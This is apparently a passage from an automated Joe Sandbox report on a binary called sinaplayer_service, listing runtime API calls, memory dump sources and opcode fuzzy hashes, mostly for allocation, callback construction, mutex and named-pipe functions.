                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003861B7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersGlobalInfo$??3@AllocFreememcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1237750234-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A4166
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A4170
                                                                                                                                                                                                    • _errno.MSVCR120(759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A417C
                                                                                                                                                                                                    • _errno.MSVCR120(759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A4186
                                                                                                                                                                                                    • _errno.MSVCR120(0000000A,759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A41AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A41B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000001,00000000,6C6C56E0,0038B65F), ref: 0038F52A
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0038F53F
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,0038F3C0,?,000000FF,00000004), ref: 0038F55E
                                                                                                                                                                                                    • CreateNamedPipeW.KERNEL32(?,40080003,00000006,00000001,00000040,00000040,00000000,00000008,?,000000FF,00000004), ref: 0038F586
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,000000FF,00000004), ref: 0038F59A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$Event$MutexNamedObjectPipeRegisterSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 503818757-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003766EF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(6C6C56E0,00000000), ref: 0037670A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,6C6C56E0,00000000), ref: 0037673D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID: Vll
                                                                                                                                                                                                    • API String ID: 3025939394-3458357932
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000002C), ref: 00387A5F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387A7A
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@ABV01@@Z.BASE(?), ref: 00387A9E
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387ABD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedFilePath@base@@SafeStateThreadV01@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 648099966-0
                                                                                                                                                                                                    • Opcode ID: 201cddc7f258cd4d89bbd5e5ade8bffd6ba965af21039cd8d4235a5ddd9cda1c
                                                                                                                                                                                                    • Instruction ID: 0c5f7b7c0eeb12c031b251d0dc24043705051f003c8b0c4cfd671f482a339d40
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201cddc7f258cd4d89bbd5e5ade8bffd6ba965af21039cd8d4235a5ddd9cda1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511EFB5904718DFCB11CF58C905B9ABBF8FB08720F10465AEC2697790D775AA04CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0038785F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,000000FF), ref: 0038787A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387896
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,000000FF), ref: 003878BB
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: 6f1ee19c7c8b059b5fdfa2dda48972aea28a6631aeb4a14a746fcdfbad988e02
                                                                                                                                                                                                    • Instruction ID: 2b5195015fec91105b9b67c195f0885405c457a5a9459b83ee50be13b282cfc5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f1ee19c7c8b059b5fdfa2dda48972aea28a6631aeb4a14a746fcdfbad988e02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6711E2B0804314DFCB11CF58D905B9ABBF8FB08720F10865AEC1597390D771A904CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387B0F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387B2A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387B4E
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387B65
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: c22ca08de36d3373259673f36fc46a0442c751d05dbeaf110aa62393c2f05e8a
                                                                                                                                                                                                    • Instruction ID: d0de632d759d881eaa6961aa0f5e3053456e050ec4f1e950986fea94859497f6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c22ca08de36d3373259673f36fc46a0442c751d05dbeaf110aa62393c2f05e8a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11E0B1904758DFCB12CF58C905B9ABBF8FB09B20F10865AEC2697780D775AA04CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: 124c82c41c5cf1d0f1d46964b9ab6f862f1102362611142c21e967f92f5b5203
                                                                                                                                                                                                    • Instruction ID: e9d41e92a803c0bfe8e6f81ddd1bcc56768d1ed3e7d1a16297d1209a1cb68bfb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 124c82c41c5cf1d0f1d46964b9ab6f862f1102362611142c21e967f92f5b5203
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511A0B1904758DFCB12DF58C905B9ABBF8FB09720F10865AEC2697780D775AA04CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0038770F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(00000000,000000FF), ref: 0038772A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387746
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,00000000,000000FF), ref: 00387765
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: b897672326482d6bba5bed556ab5e9e6f01dc33725ac9af4159f51ee47fe872e
                                                                                                                                                                                                    • Instruction ID: 7b431778a888426a471b91a7a2bbe538bfb8f12564906230492c5e47c9c9493b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b897672326482d6bba5bed556ab5e9e6f01dc33725ac9af4159f51ee47fe872e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 201102B1904758DFCB11CF58C905B9ABBF8FB09B20F10865AEC2697780D775AA04CBD0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003877BF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003877DA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 003877F6
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0038780D
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@Base@12@@Base@subtle@base@@BindCountedSafeStateThreadV012@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3918897291-0
                                                                                                                                                                                                    • Opcode ID: e2bc0ff850b207308e4cce38c0a7c122f3b3f4f240772abb4309a96718eabba0
                                                                                                                                                                                                    • Instruction ID: bf6557bbe6baf24073222361193001e6fd7a57bb5900c5172103ddf9f095052f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2bc0ff850b207308e4cce38c0a7c122f3b3f4f240772abb4309a96718eabba0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9911E1B1804358DFCB12DF58C905B9ABBF8EB08B20F10865AEC2597780D7B5A904CBD0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?terminate@@YAXXZ.MSVCR120 ref: 00397DD3
                                                                                                                                                                                                    • __crtSetUnhandledExceptionFilter.MSVCR120(00397D98), ref: 00397DDE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?terminate@@ExceptionFilterUnhandled__crt
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 327099231-1018135373
                                                                                                                                                                                                    • Opcode ID: 33659217f8d6e5dd94f7b63fe44d925ac7b41d8336ed4aefc24486925b2b32d1
                                                                                                                                                                                                    • Instruction ID: 9df6589d57b7930720507c97b0ac179ea431fa406b7b9d4c6be85b0a362a093c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33659217f8d6e5dd94f7b63fe44d925ac7b41d8336ed4aefc24486925b2b32d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE0D836128304DB8F3B9E6C984443E738EEF5030279A0851E048CFAD1DB20DD81C6A6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000002C), ref: 0037662F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0037664A
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 003766A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3993388104-0
                                                                                                                                                                                                    • Opcode ID: 0028bc8ad98c61277e7856cf23040226b49ad1a94110132b2e90c27d07162076
                                                                                                                                                                                                    • Instruction ID: c9a1499f7bf15d291669ab9b865b24c27124a4da5eed6db77b0cb7ddc7d5ac9f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0028bc8ad98c61277e7856cf23040226b49ad1a94110132b2e90c27d07162076
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E21AEB0904714DFDB21CF58C901B9ABBF8FB09724F10865EEC299B780D3B5A904CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0037E48F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0037E4AA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0037E4EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 91e838d3afb0e9b3b26ffb7fa9aa736c7caef409db6ad1f35599d76c3b72dc37
                                                                                                                                                                                                    • Instruction ID: e62313884c8db784dc7e5c32cdef259f81bd11de394c5054aaf265a52a0d825b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91e838d3afb0e9b3b26ffb7fa9aa736c7caef409db6ad1f35599d76c3b72dc37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4215EB5905754DFCB21CF58C941A9ABBF8FB09720F10865AFC66D7790D374AA04CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000020), ref: 0038790F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0038792A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0038796B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: f59ebd805f06277466250888132f8a312c4b1f9c0b70427d75548af46a601cc9
                                                                                                                                                                                                    • Instruction ID: 3b02cfbcb0b2c43092f6e62db95f5464c8bea8d08beee11f95c39a3584143c2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f59ebd805f06277466250888132f8a312c4b1f9c0b70427d75548af46a601cc9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A113AB5904715DFCB21CF58D941A9ABBF8FB09720F10866AE816D7790D771A904CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0037E53F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0037E55A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0037E595
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: ed4794f5de6582660a8b496380cdae08508415fe051f69ee3cecb54d22637e44
                                                                                                                                                                                                    • Instruction ID: e9a5548edddc219f523d2f0cbf059bef7029b58afda3d5fb74dafbc81b93de53
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed4794f5de6582660a8b496380cdae08508415fe051f69ee3cecb54d22637e44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3118FB5904758DFCB21CF58C941B9ABBF8FB0DB20F10865AEC6697790D374A904CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003863EF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,?), ref: 0038640A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,?), ref: 0038643D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 8445bd0f61ec4cd5236b51886702cfbea1ac49467969b5e9a7786db253bae028
                                                                                                                                                                                                    • Instruction ID: e1dc75fd1f55abb74e34548ca5656a9f20fc28672464fe0264f788d7bd13570c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8445bd0f61ec4cd5236b51886702cfbea1ac49467969b5e9a7786db253bae028
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B011A1B5904758DFCB21DF58D941B9ABBF8FB09B20F10866AEC26D7790D774A900CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 00389C5F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00389C7A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00389CAD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 0ecac0c947343e6ed3dbab23173b3f2bce4bc9d37a76b8ebfd024ea5f39ba23a
                                                                                                                                                                                                    • Instruction ID: f83c1ba136d9b8c6afb01b3a6b869f77a3e56316e7ee21fcc55297ce729fdbca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ecac0c947343e6ed3dbab23173b3f2bce4bc9d37a76b8ebfd024ea5f39ba23a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9111CEB5904758DFCB21CF58C941B9ABBF8FB09B20F10865BEC2697790D375A900CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 00387C70
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,?), ref: 00387C8E
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,?), ref: 00387CB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
